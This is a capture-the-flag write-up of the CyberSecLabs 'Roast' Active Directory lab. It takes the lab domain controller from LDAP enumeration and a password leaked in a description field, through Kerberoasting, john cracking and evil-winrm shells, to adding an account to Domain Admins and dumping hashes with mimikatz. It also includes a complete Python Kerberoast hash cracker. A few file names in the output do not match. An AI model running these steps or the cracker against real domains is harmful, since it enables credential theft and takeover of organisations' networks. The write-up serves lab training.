CyberSecLabs – Roast writeup

https://www.cyberseclabs.co.uk/labs/challenge-labs/all

As always, we start with an nmap scan.

kali@kali:/opt/evil-winrm$ nmap -Pn -vv -A 172.31.3.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 08:06 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 08:06
Completed Parallel DNS resolution of 1 host. at 08:06, 0.00s elapsed
Initiating Connect Scan at 08:06
Scanning 172.31.3.2 [1000 ports]
Discovered open port 53/tcp on 172.31.3.2
Discovered open port 139/tcp on 172.31.3.2
Discovered open port 445/tcp on 172.31.3.2
Discovered open port 135/tcp on 172.31.3.2
Discovered open port 3389/tcp on 172.31.3.2
Discovered open port 636/tcp on 172.31.3.2
Discovered open port 3269/tcp on 172.31.3.2
Discovered open port 593/tcp on 172.31.3.2
Discovered open port 3268/tcp on 172.31.3.2
Discovered open port 464/tcp on 172.31.3.2
Discovered open port 88/tcp on 172.31.3.2
Discovered open port 389/tcp on 172.31.3.2
Completed Connect Scan at 08:06, 6.49s elapsed (1000 total ports)
Initiating Service scan at 08:06
The open ports (53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 3389) are the signature of an Active Directory domain controller, so we follow up with the LDAP NSE scripts against port 389. Two things to know when reading the output below. First, ldap-brute still runs: the wildcard in "not brute*" is matched against script file names, so it excludes scripts whose name begins with "brute", not ldap-brute.nse, which is in the brute category. Second, every "user:<empty> => Valid credentials" line is a false positive: an LDAP simple bind with a name and an empty password is an unauthenticated (anonymous) bind, which the DC accepts, so any username appears to "work". The real finding is that this DC also answers anonymous reads of the domain partition (not the AD default), which is what lets ldap-search walk the user objects.

kali@kali:/opt$ nmap -Pn -sV --script "ldap* and not brute*" -p 389 172.31.3.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 08:51 EDT
Nmap scan report for 172.31.3.2
Host is up (0.10s latency).

PORT STATE SERVICE VERSION
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: roast.csl, Site: Default-First-Site-Name)
| ldap-brute:
| root:<empty> => Valid credentials
| admin:<empty> => Valid credentials
| administrator:<empty> => Valid credentials
| webadmin:<empty> => Valid credentials
| sysadmin:<empty> => Valid credentials
| netadmin:<empty> => Valid credentials
| guest:<empty> => Valid credentials
| user:<empty> => Valid credentials
| web:<empty> => Valid credentials
|_ test:<empty> => Valid credentials
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=roast,DC=csl
| ldapServiceName: roast.csl:roast$@ROAST.CSL
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=roast,DC=csl
| serverName: CN=ROAST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=roast,DC=csl
| schemaNamingContext: CN=Schema,CN=Configuration,DC=roast,DC=csl
| namingContexts: DC=roast,DC=csl
| namingContexts: CN=Configuration,DC=roast,DC=csl
| namingContexts: CN=Schema,CN=Configuration,DC=roast,DC=csl
| namingContexts: DC=DomainDnsZones,DC=roast,DC=csl
| namingContexts: DC=ForestDnsZones,DC=roast,DC=csl
| isSynchronized: TRUE
| highestCommittedUSN: 86066
| dsServiceName: CN=NTDS Settings,CN=ROAST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=roast,DC=csl
| dnsHostName: Roast.roast.csl
| defaultNamingContext: DC=roast,DC=csl
| currentTime: 20200817125113.0Z
|_ configurationNamingContext: CN=Configuration,DC=roast,DC=csl
| ldap-search:
| Context: DC=roast,DC=csl
| dn: DC=roast,DC=csl
| dn: CN=David Smith,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: person
| objectClass: organizationalPerson
| objectClass: user
| cn: David Smith
| sn: Smith
| description: Your Password is WelcomeToR04st
| givenName: David
| distinguishedName: CN=David Smith,OU=Roast,DC=roast,DC=csl
| instanceType: 4
| whenCreated: 2020/05/15 06:30:43 UTC
| whenChanged: 2020/05/15 21:42:47 UTC
| displayName: David Smith
| uSNCreated: 16572
| uSNChanged: 32799
| name: David Smith
| objectGUID: 95a9772-f36-7344-9cc1-53d257cf635e
| userAccountControl: 66048
| badPwdCount: 0
| codePage: 0
| countryCode: 0
| badPasswordTime: 2020-05-16T01:47:26+00:00
| lastLogoff: 0
| lastLogon: 2020-05-18T02:48:58+00:00
| logonHours: \xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF
| pwdLastSet: 2020-05-16T01:46:13+00:00
| primaryGroupID: 513
| objectSid: 1-5-21-4133422454-1522376082-951199702-1103
| accountExpires: Never
| logonCount: 1
| sAMAccountName: dsmith
| sAMAccountType: 805306368
| userPrincipalName: dsmith@roast.csl
| objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
| dSCorePropagationData: 2020/05/15 06:46:18 UTC
| dSCorePropagationData: 2020/05/15 06:38:02 UTC
| dSCorePropagationData: 1601/01/01 00:00:00 UTC
| lastLogonTimestamp: 2020-05-16T01:48:13+00:00
| dn: CN=Cody Rhodes,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: person
| objectClass: organizationalPerson
| objectClass: user
| cn: Cody Rhodes
| sn: Rhodes
| givenName: Cody
| distinguishedName: CN=Cody Rhodes,OU=Roast,DC=roast,DC=csl
| instanceType: 4
| whenCreated: 2020/05/15 06:34:11 UTC
| whenChanged: 2020/05/15 21:41:51 UTC
| displayName: Cody Rhodes
| uSNCreated: 16605
| memberOf: CN=Remote Management Users,CN=Builtin,DC=roast,DC=csl
| uSNChanged: 32794
| name: Cody Rhodes
| objectGUID: 264ab96b-32e6-7f47-9f71-45b9eae6ee8
| userAccountControl: 66048
| badPwdCount: 0
| codePage: 0
| countryCode: 0
| badPasswordTime: 2020-05-16T01:47:26+00:00
| lastLogoff: 0
| lastLogon: 2020-05-16T01:58:03+00:00
| logonHours: \xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF
| pwdLastSet: 2020-05-16T01:47:17+00:00
| primaryGroupID: 513
| objectSid: 1-5-21-4133422454-1522376082-951199702-1104
| accountExpires: Never
| logonCount: 2
| sAMAccountName: crhodes
| sAMAccountType: 805306368
| userPrincipalName: crhodes@roast.csl
| objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
| dSCorePropagationData: 2020/05/15 06:46:18 UTC
| dSCorePropagationData: 2020/05/15 06:37:46 UTC
| dSCorePropagationData: 1601/01/01 00:00:00 UTC
| lastLogonTimestamp: 2020-05-15T10:54:23+00:00
| dn: CN=Steve Smith,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: person
| objectClass: organizationalPerson
| objectClass: user
| cn: Steve Smith
| sn: Smith
| givenName: Steve
| distinguishedName: CN=Steve Smith,OU=Roast,DC=roast,DC=csl
| instanceType: 4
| whenCreated: 2020/05/15 06:35:06 UTC
| whenChanged: 2020/05/15 06:38:17 UTC
| displayName: Steve Smith
| uSNCreated: 16612
| uSNChanged: 16629
| name: Steve Smith
| objectGUID: 66dc74ae-c214-4e42-94e3-44092523e22
| userAccountControl: 66048
| badPwdCount: 2
| codePage: 0
| countryCode: 0
| badPasswordTime: 2020-05-16T01:47:26+00:00
| lastLogoff: 0
| lastLogon: Never
| pwdLastSet: 2020-05-15T10:40:32+00:00
| primaryGroupID: 513
| objectSid: 1-5-21-4133422454-1522376082-951199702-1105
| accountExpires: 30828-09-14T06:53:31+00:00
| logonCount: 0
| sAMAccountName: ssmith
| sAMAccountType: 805306368
| userPrincipalName: ssmith@roast.csl
| objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
| dSCorePropagationData: 2020/05/15 06:46:18 UTC
| dSCorePropagationData: 2020/05/15 06:38:17 UTC
| dSCorePropagationData: 1601/01/01 00:00:00 UTC
|_ dn: CN=Roast Svc,OU=Roast,DC=roast,DC=csl
Service Info: Host: ROAST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.48 seconds
kali@kali:/opt$
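The scan above is only useful if you actually read the attributes: David Smith's description field holds a password, all three users have a userAccountControl of 66048 (NORMAL_ACCOUNT plus DONT_EXPIRE_PASSWORD), and Cody Rhodes is in Remote Management Users. The following Python is an added example for this writeup (not code from the original post or from Nmap) that parses ldap-search output into entries, decodes the userAccountControl bits and flags exactly those findings. The SAMPLE text is a trimmed copy of the scan output constructed for the example; the regex for "looks like a credential" and the list of flagged groups are my choices.

```python
"""Triage of Nmap ldap-search output: split it into directory entries and flag
what the attacker above actually used (a password in a free-text attribute,
non-expiring passwords, remote-access group membership).  Added example for
this writeup; it is not part of the original post or of Nmap."""
import re
from typing import Dict, List, Tuple

Entry = Dict[str, List[str]]

# Nmap prefixes every script line with '|' ('|_' on the last one); the key is
# the LDAP attribute name.  Handles both the indented and the flattened form.
LINE = re.compile(r"^\|_?\s*([A-Za-z][\w-]*):\s*(.*)$")

# userAccountControl bits (MS-ADTS / MS-SAMR) that change how an account can be attacked.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
FREE_TEXT = ("description", "info", "comment")          # attributes admins leak secrets into
SECRET_HINT = re.compile(r"pass(word|wd)?|pwd|cred|secret", re.IGNORECASE)  # my heuristic


def parse_ldap_search(text: str) -> List[Entry]:
    """One dict per 'dn:' line; multi-valued attributes are kept as lists."""
    entries: List[Entry] = []
    current: Entry = {}
    for raw in text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if key == "dn":
            current = {"dn": [value]}
            entries.append(current)
        elif current and key not in ("ldap-search", "Context"):
            current.setdefault(key, []).append(value)
    return entries


def decode_uac(value: int) -> List[str]:
    """Names of the set userAccountControl bits, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def triage(entries: List[Entry]) -> List[Tuple[str, str]]:
    """(sAMAccountName, finding) pairs for every user object in the dump."""
    findings = []
    for e in entries:
        if "sAMAccountName" not in e:
            continue  # the domain root and OUs carry no account to act on
        sam = e["sAMAccountName"][0]
        for attr in FREE_TEXT:
            for v in e.get(attr, []):
                if SECRET_HINT.search(v):
                    findings.append((sam, f"possible credential in {attr}: {v!r}"))
        flags = decode_uac(int(e.get("userAccountControl", ["0"])[0]))
        if "DONT_EXPIRE_PASSWORD" in flags:
            findings.append((sam, "password never expires"))
        if "DONT_REQ_PREAUTH" in flags:
            findings.append((sam, "no Kerberos pre-auth required (AS-REP roastable)"))
        if "PASSWD_NOTREQD" in flags:
            findings.append((sam, "blank password permitted"))
        if any(g.startswith("CN=Remote Management Users,") for g in e.get("memberOf", [])):
            findings.append((sam, "member of Remote Management Users (WinRM/PSRemoting)"))
    return findings


# Constructed sample: a trimmed copy of the ldap-search block in the scan above.
SAMPLE = """\
| ldap-search:
|   Context: DC=roast,DC=csl
|     dn: DC=roast,DC=csl
|     dn: CN=David Smith,OU=Roast,DC=roast,DC=csl
|         description: Your Password is WelcomeToR04st
|         userAccountControl: 66048
|         sAMAccountName: dsmith
|     dn: CN=Cody Rhodes,OU=Roast,DC=roast,DC=csl
|         memberOf: CN=Remote Management Users,CN=Builtin,DC=roast,DC=csl
|         userAccountControl: 66048
|         sAMAccountName: crhodes
|     dn: CN=Steve Smith,OU=Roast,DC=roast,DC=csl
|         userAccountControl: 66048
|         badPwdCount: 2
|         sAMAccountName: ssmith
|_    dn: CN=Roast Svc,OU=Roast,DC=roast,DC=csl
"""

if __name__ == "__main__":
    for sam, finding in triage(parse_ldap_search(SAMPLE)):
        print(f"{sam:10} {finding}")
```

Feed it the full `nmap -oN` output of the scan and it yields the same three leads the rest of this writeup follows: dsmith's password, crhodes as the WinRM-capable account, and non-expiring passwords on every user.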

The description attribute of David Smith (dsmith) leaks his password, WelcomeToR04st. Before testing it, we make sure we have the latest impacket installed.

kali@kali:/opt$ sudo git-clone https://github.com/SecureAuthCorp/impacket.git
sudo: git-clone: command not found
kali@kali:/opt$ sudo git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 18128, done.
remote: Total 18128 (delta 0), reused 0 (delta 0), pack-reused 18128
Receiving objects: 100% (18128/18128), 5.97 MiB | 4.64 MiB/s, done.
Resolving deltas: 100% (13833/13833), done.
kali@kali:/opt$ cd impacket/
kali@kali:/opt/impacket$ pip3 install .


kali@kali:/opt/impacket$ crackmapexec smb 172.31.3.2 -u dsmith -p WelcomeToR04st
SMB 172.31.3.2 445 ROAST [*] Windows 10.0 Build 17763 (name:ROAST) (domain:roast.csl) (signing:True) (SMBv1:False)
SMB 172.31.3.2 445 ROAST [+] roast.csl\dsmith:WelcomeToR04st
kali@kali:/opt/evil-winrm$ crackmapexec smb 172.31.3.2 -u dsmith -p WelcomeToR04st --shares
SMB 172.31.3.2 445 ROAST [*] Windows 10.0 Build 17763 (name:ROAST) (domain:roast.csl) (signing:True) (SMBv1:False)
SMB 172.31.3.2 445 ROAST [+] roast.csl\dsmith:WelcomeToR04st
SMB 172.31.3.2 445 ROAST [+] Enumerated shares
SMB 172.31.3.2 445 ROAST Share Permissions Remark
SMB 172.31.3.2 445 ROAST ----- ----------- ------
SMB 172.31.3.2 445 ROAST ADMIN$ Remote Admin
SMB 172.31.3.2 445 ROAST C$ Default share
SMB 172.31.3.2 445 ROAST IPC$ READ Remote IPC
SMB 172.31.3.2 445 ROAST NETLOGON READ Logon server share
SMB 172.31.3.2 445 ROAST SYSVOL READ Logon server share
kali@kali:/opt/evil-winrm$
kali@kali:/opt/impacket$ crackmapexec winrm 172.31.3.2 -u dsmith -p WelcomeToR04st
WINRM 172.31.3.2 5985 ROAST [*] http://172.31.3.2:5985/wsman
WINRM 172.31.3.2 5985 ROAST [-] ROAST0\dsmith:WelcomeToR04st "Failed to authenticate the user dsmith with ntlm"
dsmith's password is valid against SMB, but WinRM rejects him: he is not in Remote Management Users. Cody Rhodes (crhodes) is, and the same password works for him too (the lsadump output further down confirms the reuse: dsmith and crhodes have identical NTLM hashes). Any authenticated domain user can request a service ticket for a registered SPN, so we Kerberoast with crhodes and write the ticket out in john/hashcat format:

kali@kali:/tmp$ GetUserSPNs.py -request -dc-ip 172.31.3.2 roast.csl/crhodes -outputfile hashes.kerberoast
Impacket v0.9.22.dev1+20200813.221956.1c893884 - Copyright 2020 SecureAuth Corporation

Password:WelcomeToR04st
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- -------- ----------------------------------------------------- -------------------------- --------- ----------
roast/ROAST roastsvc CN=Remote Management Users,CN=Builtin,DC=roast,DC=csl 2020-05-15 02:35:50.302845 <never>
kali@kali:/tmp$ cat hashes.kerberoast
$krb5tgs$23$*roastsvc$ROAST.CSL$roast/ROAST*$a06f00e18dbcc60631026290cd49c8c8$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
kali@kali:/tmp$
The $krb5tgs$23$ prefix marks an RC4-HMAC (etype 23) ticket, which is encrypted under the service account's NT hash, so the password can be guessed offline at close to NTLM speed; AES tickets (etypes 17 and 18) derive their key with PBKDF2 and crack far more slowly, which is why Kerberoasting targets RC4.

kali@kali:/tmp$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!!!watermelon245 (?)
1g 0:00:00:25 DONE (2020-08-18 05:25) 0.03957g/s 567616p/s 567616c/s 567616C/s !!12Honey.. 0860776252
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:/tmp$
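To make concrete what john is doing per guess, here is an added Python example for this writeup (not code from the original post, john or impacket) that implements the RC4-HMAC (RFC 4757) check behind the $krb5tgs$23$ format and runs it over a small wordlist. The ticket it cracks is a constructed stand-in for the redacted one above: a short fake enc-part encrypted under the password john recovered, with a random confounder, so the hash string differs on every run. MD4 is implemented inline because OpenSSL 3 based Python builds often no longer expose it through hashlib.

```python
"""Offline check of a Kerberoast hash in the john/hashcat '$krb5tgs$23$' format.
Added example for this writeup; not code from the original post, john or impacket.
An etype-23 (RC4-HMAC, RFC 4757) ticket is encrypted under the service account's
NT hash, so a guess is verified as: NT = MD4(UTF-16LE(pw)); K1 = HMAC-MD5(NT,
usage 2 as 4-byte LE); K3 = HMAC-MD5(K1, checksum); P = RC4(K3, edata); accept
iff HMAC-MD5(K1, P) == checksum."""
import hmac
import os
import struct
from hashlib import md5
from typing import Iterable, Optional, Tuple

MASK = 0xFFFFFFFF
TICKET_USAGE = 2  # RFC 4120 key usage for the ticket enc-part in a TGS-REP


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 digest (written out because hashlib may lack 'md4')."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)          # round 1 function
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)  # round 2 function
    hx = lambda x, y, z: x ^ y ^ z                   # round 3 function
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):
            a, b, c, d = d, _rotl((a + f(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _rotl((a + g(b, c, d) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):
            k = (0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4]
            a, b, c, d = d, _rotl((a + hx(b, c, d) + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        h = [(v + w) & MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 over the UTF-16LE password; this is the RC4-HMAC key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):                      # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                         # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, md5).digest()


def rc4_hmac_encrypt(nt: bytes, plaintext: bytes, usage: int = TICKET_USAGE) -> bytes:
    """RFC 4757 section 3: returns checksum || RC4(K3, confounder || plaintext)."""
    k1 = _hmac_md5(nt, struct.pack("<I", usage))
    body = os.urandom(8) + plaintext
    checksum = _hmac_md5(k1, body)
    return checksum + rc4(_hmac_md5(k1, checksum), body)


def rc4_hmac_check(nt: bytes, checksum: bytes, edata: bytes, usage: int = TICKET_USAGE) -> bool:
    """True iff `nt` is the key the ticket was encrypted under (john's per-guess test)."""
    k1 = _hmac_md5(nt, struct.pack("<I", usage))
    plain = rc4(_hmac_md5(k1, checksum), edata)
    return hmac.compare_digest(_hmac_md5(k1, plain), checksum)


def parse_krb5tgs23(line: str) -> Tuple[str, bytes, bytes]:
    """'$krb5tgs$23$*user$REALM$spn*$checksum$edata' -> (label, checksum, edata)."""
    prefix = "$krb5tgs$23$*"
    if not line.startswith(prefix):
        raise ValueError("not an etype-23 kerberoast hash")
    label, rest = line[len(prefix):].split("*$", 1)
    checksum_hex, edata_hex = rest.split("$", 1)
    return label, bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """First password in `wordlist` whose NT hash decrypts the ticket, else None."""
    _, checksum, edata = parse_krb5tgs23(line)
    return next((pw for pw in wordlist if rc4_hmac_check(nt_hash(pw), checksum, edata)), None)


# Constructed stand-in for the redacted ticket on the page: a short fake enc-part
# (a real one is a ~1 KiB DER EncTicketPart) under the password john recovered above.
SERVICE_PASSWORD = "!!!watermelon245"
_blob = rc4_hmac_encrypt(nt_hash(SERVICE_PASSWORD), b"\x63\x82\x00\x20fake EncTicketPart for roast/ROAST")
SAMPLE_HASH = f"$krb5tgs$23$*roastsvc$ROAST.CSL$roast/ROAST*${_blob[:16].hex()}${_blob[16:].hex()}"
WORDLIST = ["password", "Welcome1", "WelcomeToR04st", "!!!watermelon245", "Summer2020"]  # constructed

if __name__ == "__main__":
    print(SAMPLE_HASH[:72] + "...")
    print("cracked:", crack(SAMPLE_HASH, WORDLIST))
```

The cost per guess is one MD4, three HMAC-MD5s and an RC4 pass over the ticket, with no salt and no iteration count, which is why rockyou finishes in 25 seconds on two threads above. The same check with the page's real hash line would work unchanged, since the format is identical.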
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u roastsvc -p '!!!watermelon245'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\roastsvc\Documents>
kali@kali:/opt/evil-winrm$ crackmapexec winrm 172.31.3.2 -u crhodes -p WelcomeToR04st
WINRM 172.31.3.2 5985 ROAST [*] http://172.31.3.2:5985/wsman
WINRM 172.31.3.2 5985 ROAST [+] ROAST0\crhodes:WelcomeToR04st (Pwn3d!)
kali@kali:/opt/evil-winrm$
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u crhodes -p 'WelcomeToR04st'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\crhodes\Documents> cd c:\puck

*Evil-WinRM* PS C:\puck> upload /opt/Bloodhound/Ingestors/Sharphound.exe
Info: Uploading /opt/Bloodhound/Ingestors/Sharphound.exe to C:\puck\Sharphound.exe


Data: 1110016 bytes of 1110016 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\puck> upload /opt/Bloodhound/Ingestors/Sharphound.ps1
Info: Uploading /opt/Bloodhound/Ingestors/Sharphound.ps1 to C:\puck\Sharphound.ps1


Data: 1297764 bytes of 1297764 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\puck> dir


Directory: C:\puck


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/18/2020 3:42 AM 832512 Sharphound.exe
-a---- 8/18/2020 3:42 AM 973323 Sharphound.ps1


*Evil-WinRM* PS C:\puck> ./Sharphound.exe
-----------------------------------------------
Initializing SharpHound at 3:42 AM on 8/18/2020
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain ROAST.CSL using path CN=Schema,CN=Configuration,DC=ROAST,DC=CSL
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 61 objects finished (+61 61)/s -- Using 26 MB RAM
Enumeration finished in 00:00:01.8335102
Compressing data to .\20200818034254_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 3:42 AM on 8/18/2020! Happy Graphing!

*Evil-WinRM* PS C:\puck> dir


Directory: C:\puck


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/18/2020 3:42 AM 8935 20200818034254_BloodHound.zip
-a---- 8/18/2020 3:42 AM 832512 Sharphound.exe
-a---- 8/18/2020 3:42 AM 973323 Sharphound.ps1
-a---- 8/18/2020 3:42 AM 10118 ZDU2MDE4M2MtOTJlZC00MTRlLWFhMmEtOGJlM2E2ODA4ZjUy.bin
*Evil-WinRM* PS C:\puck>
*Evil-WinRM* PS C:\puck> download 20200819234325_BloodHound.zip /tmp/20200819234325_BloodHound.zip
Info: Downloading C:\puck\20200819234325_BloodHound.zip to /tmp/20200819234325_BloodHound.zip

Info: Download successful!
*Evil-WinRM* PS C:\puck>

From the roastsvc shell the account is added to Domain Admins, after which mimikatz is run on the DC to dump the NTLM hashes of every domain account:

net group "domain admins" roastsvc /add

Note that the first mimikatz argument below is mistyped (privilege:debug instead of privilege::debug) and is rejected by the standard module; the lsadump::lsa /patch step that follows still succeeds, so the shell already had the rights it needed.

*Evil-WinRM* PS C:\users\roastsvc\Documents> ./mimikatz.exe "privilege:debug" "lsadump::lsa /patch" "exit"

.#####. mimikatz 2.2.0 (x64) #18362 May 2 2020 16:23:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz(commandline) # privilege:debug
ERROR mimikatz_doLocal ; "privilege:debug" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
